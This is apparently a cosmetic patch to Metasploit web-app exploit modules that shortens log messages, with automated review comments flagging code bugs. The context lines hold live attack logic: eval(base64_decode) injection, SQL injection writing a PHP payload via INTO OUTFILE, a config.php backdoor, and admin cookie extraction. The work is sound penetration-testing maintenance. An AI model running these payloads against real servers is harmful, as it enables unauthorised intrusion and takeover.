@@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Exploiting the preg_replace() to execute PHP code") + print_status("Exploiting the preg_replace() to execute PHP code") res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//") end end diff --git a/modules/exploits/unix/webapp/egallery_upload_exec.rb b/modules/exploits/unix/webapp/egallery_upload_exec.rb index a218ee92b0..8b24944c6f 100644 --- a/modules/exploits/unix/webapp/egallery_upload_exec.rb +++ b/modules/exploits/unix/webapp/egallery_upload_exec.rb @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data << " ?>\r\n" post_data << "--#{boundary}--\r\n" - print_status("#{peer} - Sending PHP payload (#{payload_name})") + print_status("Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri("#{uri}egallery/uploadify.php"), @@ -102,11 +102,11 @@ class Metasploit3 < Msf::Exploit::Remote # If the server returns 200 and the body contains our payload name, # we assume we uploaded the malicious file successfully if not res or res.code != 200 or res.body !~ /#{payload_name}/ - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{payload_name})") + print_status("Executing PHP payload (#{payload_name})") # Execute our payload res = send_request_cgi({ 'method' => 'GET', @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end 
diff --git a/modules/exploits/unix/webapp/flashchat_upload_exec.rb b/modules/exploits/unix/webapp/flashchat_upload_exec.rb index b4cb968c14..6324068bf5 100644 --- a/modules/exploits/unix/webapp/flashchat_upload_exec.rb +++ b/modules/exploits/unix/webapp/flashchat_upload_exec.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => uri}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version found: #{version}") + vprint_status("Version found: #{version}") if version =~ /6\.0\.(2|4|5|6|7|8)/ return Exploit::CheckCode::Appears @@ -132,14 +132,14 @@ class Metasploit3 < Msf::Exploit::Remote base = target_uri.path # upload - print_status("#{peer} - Uploading malicious file...") + print_status("Uploading malicious file...") fname = upload(base) # register the file to clean register_files_for_cleanup(fname) # exec - print_status("#{peer} - Executing #{fname}...") + print_status("Executing #{fname}...") exec(base, fname) end end diff --git a/modules/exploits/unix/webapp/freepbx_config_exec.rb b/modules/exploits/unix/webapp/freepbx_config_exec.rb index 58afa2be55..f530c09ab0 100644 --- a/modules/exploits/unix/webapp/freepbx_config_exec.rb +++ b/modules/exploits/unix/webapp/freepbx_config_exec.rb @@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote def check - vprint_status("#{peer} - Trying to detect installed version") + vprint_status("Trying to detect installed version") res = send_request_cgi({ 'method' => 'GET', @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - vprint_status("#{peer} - Version #{version} detected") + vprint_status("Version #{version} detected") if version =~ /2\.(9|10|11)\.0/ return Exploit::CheckCode::Appears 
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit rand_data = rand_text_alpha_lower(rand(10) + 5) - print_status("#{peer} - Sending payload") + print_status("Sending payload") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "admin", "config.php"), @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. if res and res.code != 200 - print_error("#{peer} - Unexpected response, exploit probably failed!") + print_error("Unexpected response, exploit probably failed!") end end diff --git a/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb b/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb index 5c2569966f..5d3afc9353 100644 --- a/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb +++ b/modules/exploits/unix/webapp/get_simple_cms_upload_exec.rb @@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - Version #{version} found") + print_status("Version #{version} found") if Gem::Version.new(version) <= Gem::Version.new('3.1.2') return Exploit::CheckCode::Appears 
@@ -103,34 +103,34 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Authenticating...") + print_status("Authenticating...") res = send_request_auth if res && res.code == 302 - print_status("#{peer} - The authentication process is done successfully!") + print_status("The authentication process is done successfully!") else fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end - print_status("#{peer} - Extracting Cookies Information...") + print_status("Extracting Cookies Information...") cookie = res.get_cookies if cookie.blank? fail_with(Failure::NoAccess, "#{peer} - Authentication failed") end - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") payload_name = rand_text_alpha_lower(rand(10) + 5) + '.pht' res = send_request_upload(payload_name, cookie) if res && res.code == 200 && res.body && res.body.to_s =~ /Success! File location.*>.*#{target_uri.path.to_s}(.*)#{payload_name}</ upload_path = $1 - print_good("#{peer} - File uploaded to #{upload_path}") + print_good("File uploaded to #{upload_path}") register_file_for_cleanup(payload_name) else fail_with(Failure::Unknown, "#{peer} - Upload failed") end - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_raw({ 'uri' => normalize_uri(target_uri.path.to_s, upload_path, payload_name), 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/hastymail_exec.rb b/modules/exploits/unix/webapp/hastymail_exec.rb index 13ce643e2e..8840dc855c 100644 --- a/modules/exploits/unix/webapp/hastymail_exec.rb +++ b/modules/exploits/unix/webapp/hastymail_exec.rb @@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote login if not @session_id or @session_id.empty? - vprint_error "#{peer} - Authentication failed" + vprint_error "Authentication failed" return Exploit::CheckCode::Unknown end 
@@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 303 @session_id = res.get_cookies - print_good "#{peer} - Authentication successful" + print_good "Authentication successful" end end @@ -113,15 +113,15 @@ class Metasploit3 < Msf::Exploit::Remote @uri << '/' if @uri[-1,1] != '/' @session_id = "" - print_status "#{peer} - Trying login" + print_status "Trying login" login if not @session_id or @session_id.empty? - print_error "#{peer} - Authentication failed" + print_error "Authentication failed" return end - print_status "#{peer} - Authentication successfully, trying to exploit" + print_status "Authentication successfully, trying to exploit" data = "rs=passthru&" data << "rsargs[]=#{rand_text_alpha(rand(4) + 4)}&" @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 or not res.body =~ /\+/ - print_error "#{peer} - Exploitation failed" + print_error "Exploitation failed" return end diff --git a/modules/exploits/unix/webapp/havalite_upload_exec.rb b/modules/exploits/unix/webapp/havalite_upload_exec.rb index 311d36732b..f76388a42d 100644 --- a/modules/exploits/unix/webapp/havalite_upload_exec.rb +++ b/modules/exploits/unix/webapp/havalite_upload_exec.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote res = send_request_raw({'uri' => uri}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || '' if not version.empty? and version =~ /1\.1\.7/ - vprint_status("#{peer} - Version found: #{version}") + vprint_status("Version found: #{version}") return Exploit::CheckCode::Appears end 
@@ -124,10 +124,10 @@ class Metasploit3 < Msf::Exploit::Remote def exploit base = target_uri.path - print_status("#{peer} - Uploading malicious file...") + print_status("Uploading malicious file...") fname = upload(base) - print_status("#{peer} - Executing #{fname}...") + print_status("Executing #{fname}...") exec(base, fname) end end diff --git a/modules/exploits/unix/webapp/horde_unserialize_exec.rb b/modules/exploits/unix/webapp/horde_unserialize_exec.rb index 92437ae125..ecfd1ac294 100644 --- a/modules/exploits/unix/webapp/horde_unserialize_exec.rb +++ b/modules/exploits/unix/webapp/horde_unserialize_exec.rb @@ -61,12 +61,12 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Testing injection...") + print_status("Testing injection...") unless check == Exploit::CheckCode::Vulnerable fail_with(Failure::NotVulnerable, "#{peer} - Target isn't vulnerable, exiting...") end - print_status("#{peer} - Exploiting the unserialize()...") + print_status("Exploiting the unserialize()...") send_request_exploit(payload.encoded) end diff --git a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb index 2ca9e0026e..6b495eed60 100644 --- a/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb +++ b/modules/exploits/unix/webapp/hybridauth_install_php_exec.rb 
@@ -61,19 +61,19 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php') if !res - vprint_error "#{peer} - Connection failed" + vprint_error "Connection failed" return Exploit::CheckCode::Unknown elsif res.code == 404 - vprint_error "#{peer} - Could not find install.php" + vprint_error "Could not find install.php" elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</ - vprint_error "#{peer} - #{$1} is not writable" + vprint_error "#{$1} is not writable" elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</ version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first - vprint_status "#{peer} - Found version: #{version}" + vprint_status "Found version: #{version}" if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/ return Exploit::CheckCode::Vulnerable else - vprint_error "#{peer} - HybridAuth version #{version} is not vulnerable" + vprint_error "HybridAuth version #{version} is not vulnerable" end end Exploit::CheckCode::Safe @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote end # write backdoor - print_status "#{peer} - Writing backdoor to config.php" + print_status "Writing backdoor to config.php" payload_param = rand(1000) res = send_request_cgi( 'method' => 'POST', 
@@ -99,40 +99,40 @@ class Metasploit3 < Msf::Exploit::Remote if !res fail_with Failure::Unknown, "#{peer} - Connection failed" elsif res.body =~ /Installation completed/ - print_good "#{peer} - Wrote backdoor successfully" + print_good "Wrote backdoor successfully" else fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'" end # execute payload code = Rex::Text.encode_base64(payload.encoded) - print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)" + print_status "Sending payload to config.php backdoor (#{code.length} bytes)" res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'config.php'), 'data' => "#{payload_param}=#{code}" }, 5) if !res - print_warning "#{peer} - No response" + print_warning "No response" elsif res.code == 404 fail_with Failure::NotFound, "#{peer} - Could not find config.php" elsif res.code == 200 || res.code == 500 - print_good "#{peer} - Sent payload successfully" + print_good "Sent payload successfully" end # remove backdoor - print_status "#{peer} - Removing backdoor from config.php" + print_status "Removing backdoor from config.php" res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'install.php'), 'data' => 'OPENID_ADAPTER_STATUS=' ) if !res - print_error "#{peer} - Connection failed" + print_error "Connection failed" elsif res.body =~ /Installation completed/ - print_good "#{peer} - Removed backdoor successfully" + print_good "Removed backdoor successfully" else - print_warning "#{peer} - Could not remove payload from config.php" + print_warning "Could not remove payload from config.php" end end end diff --git a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb index 8544567488..e2b2f8b485 100644 --- a/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb 
+++ b/modules/exploits/unix/webapp/invision_pboard_unserialize_exec.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote end def cookie_prefix - print_status("#{peer} - Checking for cookie prefix") + print_status("Checking for cookie prefix") cookie_prefix = "" res = send_request_cgi( { @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.get_cookies =~ /(.+)session/ - print_status("#{peer} - Cookie prefix #{$1} found") + print_status("Cookie prefix #{$1} found") cookie_prefix = $1 end return cookie_prefix @@ -104,11 +104,11 @@ class Metasploit3 < Msf::Exploit::Remote if client.type == "meterpreter" client.core.use("stdapi") if not client.ext.aliases.include?("stdapi") begin - print_warning("#{peer} - Deleting #{@upload_php}") + print_warning("Deleting #{@upload_php}") client.fs.file.rm(@upload_php) - print_good("#{peer} - #{@upload_php} removed to stay ninja") + print_good("#{@upload_php} removed to stay ninja") rescue - print_error("#{peer} - Unable to remove #{f}") + print_error("Unable to remove #{f}") end end end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote db_driver_mysql = "a:1:{i:0;O:15:\"db_driver_mysql\":1:{s:3:\"obj\";a:2:{s:13:\"use_debug_log\";i:1;s:9:\"debug_log\";s:#{"cache/#{@upload_php}".length}:\"cache/#{@upload_php}\";}}}" - print_status("#{peer} - Exploiting the unserialize() to upload PHP code") + print_status("Exploiting the unserialize() to upload PHP code") res = send_request_cgi( { 
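Review bot: In the `@@ -104,11 +104,11 @@` hunk of invision_pboard_unserialize_exec.rb, the rescue branch interpolates `f`, which is not assigned anywhere in the visible lines. The file being removed is `@upload_php`. If `f` is undefined in the rest of the method, the handler raises NameError and hides the original cleanup failure. I would change the line to `print_error("Unable to remove #{@upload_php}")`. The enclosing method starts and ends outside the hunk, so `f` should be checked against the full file.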
@@ -139,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 200 - print_error("#{peer} - Exploit failed: #{res.code}") + print_error("Exploit failed: #{res.code}") return end - print_status("#{peer} - Executing the payload #{@upload_php}") + print_status("Executing the payload #{@upload_php}") res = send_request_raw({'uri' => "#{base}cache/#{@upload_php}"}) if res - print_error("#{peer} - Payload execution failed: #{res.code}") + print_error("Payload execution failed: #{res.code}") return end diff --git a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb index 4319647596..7836c4732d 100644 --- a/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb +++ b/modules/exploits/unix/webapp/joomla_akeeba_unserialize.rb @@ -79,7 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote @zip = zip_file.pack # First step: call restore to run _prepare() and get an initialized AKFactory - print_status("#{peer} - Sending PHP serialized object...") + print_status("Sending PHP serialized object...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'), 'vars_get' => { @@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote prepared_factory = Rex::Text.decode_base64(b64encoded_prepared_factory) modified_factory = prepared_factory.gsub('currentPartNumber";i:0', 'currentPartNumber";i:-1') - print_status("#{peer} - Sending initialized and modified AKFactory...") + print_status("Sending initialized and modified AKFactory...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', 'restore.php'), 'vars_get' => { 
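Review bot: In the first hunk on this line (`@@ -139,16 +139,16 @@`, invision_pboard_unserialize_exec.rb), `if not res or res.code != 200` is also taken when `res` is nil. The message then calls `res.code` on nil and raises NoMethodError instead of reporting the failure. A nil-safe message avoids that: `print_error("Exploit failed: #{res ? res.code : 'no response'}")`. The method body continues outside the hunk.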
@@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(php_filename) - print_status("#{peer} - Executing payload...") + print_status("Executing payload...") send_request_cgi({ 'uri' => normalize_uri(target_uri, 'administrator', 'components', 'com_joomlaupdate', php_filename) }, 2) diff --git a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb index fa6e5d8723..a48ba48d99 100644 --- a/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb +++ b/modules/exploits/unix/webapp/joomla_contenthistory_sqli_rce.rb @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 500 && res.body =~ /`(.*)_ucm_history`/ table_prefix = $1 - print_status("#{peer} - Retrieved table prefix [ #{table_prefix} ]") + print_status("Retrieved table prefix [ #{table_prefix} ]") else fail_with(Failure::Unknown, "#{peer} - Error retrieving table prefix") end @@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 500 && res.body =~ /Duplicate entry '([a-z0-9]+)' for key/ auth_cookie_part = $1[0...-1] - print_status("#{peer} - Retrieved admin cookie [ #{auth_cookie_part} ]") + print_status("Retrieved admin cookie [ #{auth_cookie_part} ]") else fail_with(Failure::Unknown, "#{peer}: No logged-in admin user found!") end @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.get_cookies =~ /^([a-z0-9]+)=[a-z0-9]+;/ cookie_begin = $1 - print_status("#{peer} - Retrieved unauthenticated cookie [ #{cookie_begin} ]") + print_status("Retrieved unauthenticated cookie [ #{cookie_begin} ]") else fail_with(Failure::Unknown, "#{peer} - Error retrieving unauthenticated cookie") end 
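Review bot: The `@@ -118,7 +118,7 @@` hunk of joomla_contenthistory_sqli_rce.rb writes a recovered administrator session value to normal-verbosity output with `print_status("Retrieved admin cookie [ #{auth_cookie_part} ]")`. That value ends up in console scrollback and in any spooled or shared engagement log. I would use `vprint_status` or print only a truncated form, and keep the full value in the framework's structured reporting rather than free text. The same applies to `print_status("Admin password hash is [ #{adminhash} ]")` in the `@@ -130,7 +130,7 @@` hunk of openemr_sqli_privesc_upload.rb.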
@@ -150,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 200 && res.body =~ /Administration - Control Panel/ - print_status("#{peer} - Successfully authenticated as Administrator") + print_status("Successfully authenticated as Administrator") else fail_with(Failure::Unknown, "#{peer} - Session failure") end @@ -178,7 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote filename = rand_text_alphanumeric(rand(10)+6) # Create file - print_status("#{peer} - Creating file [ #{filename}.php ]") + print_status("Creating file [ #{filename}.php ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), @@ -198,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote # Grab token if res && res.code == 303 && res.headers['Location'] location = res.headers['Location'] - print_status("#{peer} - Following redirect to [ #{location} ]") + print_status("Following redirect to [ #{location} ]") res = send_request_cgi( 'uri' => location, 'method' => 'GET', @@ -208,14 +208,14 @@ class Metasploit3 < Msf::Exploit::Remote # Retrieving template token if res && res.code == 200 && res.body =~ /&([a-z0-9]+)=1\">/ token = $1 - print_status("#{peer} - Token [ #{token} ] retrieved") + print_status("Token [ #{token} ] retrieved") else fail_with(Failure::Unknown, "#{peer} - Retrieving token failed") end if res && res.code == 200 && res.body =~ /(\/templates\/.*\/)template_preview.png/ template_path = $1 - print_status("#{peer} - Template path [ #{template_path} ] retrieved") + print_status("Template path [ #{template_path} ] retrieved") else fail_with(Failure::Unknown, "#{peer} - Unable to retrieve template path") end 
@@ -227,7 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote filename_base64 = Rex::Text.encode_base64("/#{filename}.php") # Inject payload data into file - print_status("#{peer} - Insert payload into file [ #{filename}.php ]") + print_status("Insert payload into file [ #{filename}.php ]") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, "administrator", "index.php"), @@ -248,14 +248,14 @@ class Metasploit3 < Msf::Exploit::Remote }) if res && res.code == 303 && res.headers['Location'] =~ /\/administrator\/index.php\?option=com_templates&view=template&id=#{template_id}&file=/ - print_status("#{peer} - Payload data inserted into [ #{filename}.php ]") + print_status("Payload data inserted into [ #{filename}.php ]") else fail_with(Failure::Unknown, "#{peer} - Could not insert payload into file [ #{filename}.php ]") end # Request payload register_files_for_cleanup("#{filename}.php") - print_status("#{peer} - Executing payload") + print_status("Executing payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, template_path, "#{filename}.php"), diff --git a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb index cad27d9654..5d2cb35756 100644 --- a/modules/exploits/unix/webapp/joomla_media_upload_exec.rb +++ b/modules/exploits/unix/webapp/joomla_media_upload_exec.rb 
@@ -70,10 +70,10 @@ class Metasploit3 < Msf::Exploit::Remote if res and (res.code == 200 or res.code == 302) if res.body =~ /You are not authorised to view this resource/ - vprint_status("#{peer} - Joomla Media Manager Found but authentication required") + vprint_status("Joomla Media Manager Found but authentication required") return Exploit::CheckCode::Detected elsif res.body =~ /<form action="(.*)" id="uploadForm"/ - vprint_status("#{peer} - Joomla Media Manager Found and authentication isn't required") + vprint_status("Joomla Media Manager Found and authentication isn't required") return Exploit::CheckCode::Detected end end @@ -174,18 +174,18 @@ class Metasploit3 < Msf::Exploit::Remote @username = datastore['USERNAME'] @password = datastore['PASSWORD'] - print_status("#{peer} - Checking Access to Media Component...") + print_status("Checking Access to Media Component...") res = get_upload_form if res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /You are not authorised to view this resource/ - print_status("#{peer} - Authentication required... Proceeding...") + print_status("Authentication required... Proceeding...") if @username.empty? or @password.empty? fail_with(Failure::BadConfig, "#{peer} - Authentication is required to access the Media Manager Component, please provide credentials") end @cookies = res.get_cookies.sub(/;$/, "") - print_status("#{peer} - Accessing the Login Form...") + print_status("Accessing the Login Form...") res = get_login_form if res.nil? or (res.code != 200 and res.code != 302) or res.body !~ /login/ fail_with(Failure::Unknown, "#{peer} - Unable to Access the Login Form") 
@@ -197,13 +197,13 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoAccess, "#{peer} - Unable to Authenticate") end elsif res and (res.code == 200 or res.code == 302) and !res.get_cookies.empty? and res.body =~ /<form action="(.*)" id="uploadForm"/ - print_status("#{peer} - Authentication isn't required.... Proceeding...") + print_status("Authentication isn't required.... Proceeding...") @cookies = res.get_cookies.sub(/;$/, "") else fail_with(Failure::UnexpectedReply, "#{peer} - Failed to Access the Media Manager Component") end - print_status("#{peer} - Accessing the Upload Form...") + print_status("Accessing the Upload Form...") res = get_upload_form if res and (res.code == 200 or res.code == 302) and res.body =~ /<form action="(.*)" id="uploadForm"/ @@ -212,7 +212,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to Access the Upload Form") end - print_status("#{peer} - Uploading shell...") + print_status("Uploading shell...") res = upload(upload_uri) @@ -221,7 +221,7 @@ class Metasploit3 < Msf::Exploit::Remote end register_files_for_cleanup("#{@upload_name}.") - print_status("#{peer} - Executing shell...") + print_status("Executing shell...") send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "images", @upload_name), diff --git a/modules/exploits/unix/webapp/kimai_sqli.rb b/modules/exploits/unix/webapp/kimai_sqli.rb index b088c8e86f..51c9a53ffa 100644 --- a/modules/exploits/unix/webapp/kimai_sqli.rb +++ b/modules/exploits/unix/webapp/kimai_sqli.rb 
@@ -63,14 +63,14 @@ class Metasploit3 < Msf::Exploit::Remote # Checks if target is Kimai version 0.9.2.x # def check - vprint_status("#{peer} - Checking version...") + vprint_status("Checking version...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, "index.php") }) if not res - vprint_error("#{peer} - Request timed out") + vprint_error("Request timed out") return Exploit::CheckCode::Unknown elsif res.body =~ /Kimai/ and res.body =~ /(0\.9\.[\d\.]+)<\/strong>/ version = "#{$1}" - print_good("#{peer} - Found version: #{version}") + print_good("Found version: #{version}") if version >= "0.9.2" and version <= "0.9.2.1306" return Exploit::CheckCode::Appears end 
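Review bot: In `check`, `version >= "0.9.2" and version <= "0.9.2.1306"` compares strings lexicographically, so the verdict can be wrong for real version numbers: "0.9.2.200" sorts above "0.9.2.1306" and "0.9.10" sorts below "0.9.2". get_simple_cms_upload_exec.rb in this same patch already compares with `Gem::Version.new(version) <= Gem::Version.new('3.1.2')`. The same form fits here: `Gem::Version.new(version).between?(Gem::Version.new('0.9.2'), Gem::Version.new('0.9.2.1306'))`. The same string comparison appears as `version < "4.1.2"` in openemr_sqli_privesc_upload.rb (`@@ -69,7 +69,7 @@`) and `version > "4.1.1"` in openemr_upload_exec.rb (`@@ -69,14 +69,14 @@`).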
@@ -81,33 +81,33 @@ class Metasploit3 < Msf::Exploit::Remote def exploit # Get file system path - print_status("#{peer} - Retrieving file system path...") + print_status("Retrieving file system path...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'includes/vars.php') }) if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif res.body =~ /Undefined variable: .+ in (.+)includes\/vars\.php on line \d+/ path = "#{$1}" - print_good("#{peer} - Found file system path: #{path}") + print_good("Found file system path: #{path}") else path = normalize_uri(datastore['FALLBACK_TARGET_PATH'], target_uri.path) - print_warning("#{peer} - Could not retrieve file system path. Assuming '#{path}'") + print_warning("Could not retrieve file system path. Assuming '#{path}'") end # Get MySQL table name prefix from temporary/logfile.txt - print_status("#{peer} - Retrieving MySQL table name prefix...") + print_status("Retrieving MySQL table name prefix...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'temporary', 'logfile.txt') }) if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif prefixes = res.body.scan(/CREATE TABLE `(.+)usr`/) table_prefix = "#{prefixes.flatten.last}" - print_good("#{peer} - Found table name prefix: #{table_prefix}") + print_good("Found table name prefix: #{table_prefix}") else table_prefix = normalize_uri(datastore['FALLBACK_TABLE_PREFIX'], target_uri.path) - print_warning("#{peer} - Could not retrieve MySQL table name prefix. Assuming '#{table_prefix}'") + print_warning("Could not retrieve MySQL table name prefix. Assuming '#{table_prefix}'") end # Create a backup ID - print_status("#{peer} - Creating a backup to get a valid backup ID...") + print_status("Creating a backup to get a valid backup ID...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'db_restore.php'), 
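Review bot: The branch `elsif prefixes = res.body.scan(...)` is always taken once a response arrives, because `String#scan` returns an array and an empty array is truthy in Ruby. The `else` fallback and its "Could not retrieve MySQL table name prefix" warning are therefore unreachable, and a non-matching body logs "Found table name prefix: " with an empty value. Test the result rather than the assignment, e.g. `elsif (prefixes = res.body.scan(...)).any?`. The `elsif backup_ids = res.body.scan(...)` branch in the following `@@ -119,7 +119,7 @@` hunk has the same shape, so its `fail_with` is unreachable for the same reason.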
@@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif backup_ids = res.body.scan(/name="dates\[\]" value="(\d+)">/) id = "#{backup_ids.flatten.last}" - print_good("#{peer} - Found backup ID: #{id}") + print_good("Found backup ID: #{id}") else fail_with(Failure::Unknown, "#{peer} - Could not retrieve backup ID") end @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote # Write PHP payload to disk using MySQL injection 'into outfile' fname = "#{rand_text_alphanumeric(rand(10)+10)}.php" sqli = "#{id}_#{table_prefix}var UNION SELECT '<?php #{payload.encoded} ?>' INTO OUTFILE '#{path}/temporary/#{fname}';-- " - print_status("#{peer} - Writing payload (#{payload.encoded.length} bytes) to '#{path}/temporary/#{fname}'...") + print_status("Writing payload (#{payload.encoded.length} bytes) to '#{path}/temporary/#{fname}'...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'db_restore.php'), @@ -139,14 +139,14 @@ class Metasploit3 < Msf::Exploit::Remote if not res fail_with(Failure::Unknown, "#{peer} - Request timed out") elsif res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") register_files_for_cleanup(fname) else - print_error("#{peer} - Sending payload failed. Received HTTP code: #{res.code}") + print_error("Sending payload failed. Received HTTP code: #{res.code}") end # Remove the backup - print_status("#{peer} - Removing the backup...") + print_status("Removing the backup...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'db_restore.php'), 
@@ -156,15 +156,15 @@ class Metasploit3 < Msf::Exploit::Remote }.to_a.shuffle] }) if not res - print_warning("#{peer} - Request timed out") + print_warning("Request timed out") elsif res.code == 302 and res.body !~ /#{id}/ - vprint_good("#{peer} - Deleted backup with ID '#{id}'") + vprint_good("Deleted backup with ID '#{id}'") else - print_warning("#{peer} - Could not remove backup with ID '#{id}'") + print_warning("Could not remove backup with ID '#{id}'") end # Execute payload - print_status("#{peer} - Retrieving file '#{fname}'...") + print_status("Retrieving file '#{fname}'...") res = send_request_raw({ 'uri' => normalize_uri(target_uri.path, 'temporary', "#{fname}") }, 5) diff --git a/modules/exploits/unix/webapp/libretto_upload_exec.rb b/modules/exploits/unix/webapp/libretto_upload_exec.rb index 8030e347cc..b68a39ed2e 100644 --- a/modules/exploits/unix/webapp/libretto_upload_exec.rb +++ b/modules/exploits/unix/webapp/libretto_upload_exec.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_raw({'uri' => normalize_uri(target_uri.path)}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end @@ -132,13 +132,13 @@ class Metasploit3 < Msf::Exploit::Remote def exploit base = target_uri.path - print_status("#{peer} - Uploading malicious file...") + print_status("Uploading malicious file...") orig_fname = upload(base) - print_status("#{peer} - Renaming 